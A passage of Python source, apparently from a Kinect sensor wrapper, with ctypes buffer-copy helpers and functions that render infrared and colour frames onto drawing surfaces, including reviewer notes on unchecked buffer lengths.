    directly, or an object with ``value`` / ``raw`` attributes (such as a
    ctypes string buffer), whose ``value`` is replaced by the first
    *offset* raw bytes followed by *data*.
    """
    if isinstance(buffer, ctypes.POINTER(ctypes.c_byte)):
        if offset == 0:
            destination = buffer
        else:
            # Honour the offset for raw pointers too; it was previously
            # ignored in this branch.
            destination = ctypes.addressof(buffer.contents) + offset
        ctypes.memmove(destination, data, len(data))
        return
    if offset == 0:
        buffer.value = data
    else:
        buffer.value = buffer.raw[0:offset] + data
def struct_from_buffer(library, type_, buffer):
    """Return a pointer to a new ``library.<type_>`` filled from *buffer*.

    The structure class is looked up by name on *library*, instantiated,
    and ``sizeof`` that class bytes are copied from *buffer* over it.

    NOTE(review): *buffer* is not checked to be at least that long.
    """
    struct_type = getattr(library, type_)
    instance = struct_type()
    n_bytes = ctypes.sizeof(struct_type)
    ctypes.memmove(ctypes.addressof(instance), buffer, n_bytes)
    return ctypes.pointer(instance)
def draw_infrared_frame(self, frame, target_surface):
    """Render an infrared *frame* into *target_surface* as 8-bit grey.

    Values are clipped to 1..4000, divided by 16 and converted to
    ``uint8``, replicated across three channels, and copied into the
    surface buffer.  A ``None`` frame is ignored.  The surface is unlocked
    again even if the conversion or copy fails.
    """
    if frame is None:
        # Some USB hubs do not provide the infrared image (it works with
        # Kinect Studio though).
        return
    target_surface.lock()
    try:
        f8 = np.uint8(frame.clip(1, 4000) / 16.)
        frame8bit = np.dstack((f8, f8, f8))
        address = self._kinect.surface_as_array(target_surface.get_buffer())
        # One byte per element, so size equals the byte count here.
        ctypes.memmove(address, frame8bit.ctypes.data, frame8bit.size)
        del address
    finally:
        # Never leave the surface locked.
        target_surface.unlock()
def draw_color_frame(self, frame, target_surface):
    """Copy a colour *frame* into *target_surface*'s pixel buffer.

    The surface is locked for the copy and unlocked again even if the
    copy fails.
    """
    target_surface.lock()
    try:
        address = self._kinect.surface_as_array(target_surface.get_buffer())
        # NOTE(review): frame.size is an element count; it equals the byte
        # count only for one-byte dtypes -- confirm the frame dtype.
        ctypes.memmove(address, frame.ctypes.data, frame.size)
        del address
    finally:
        # Never leave the surface locked.
        target_surface.unlock()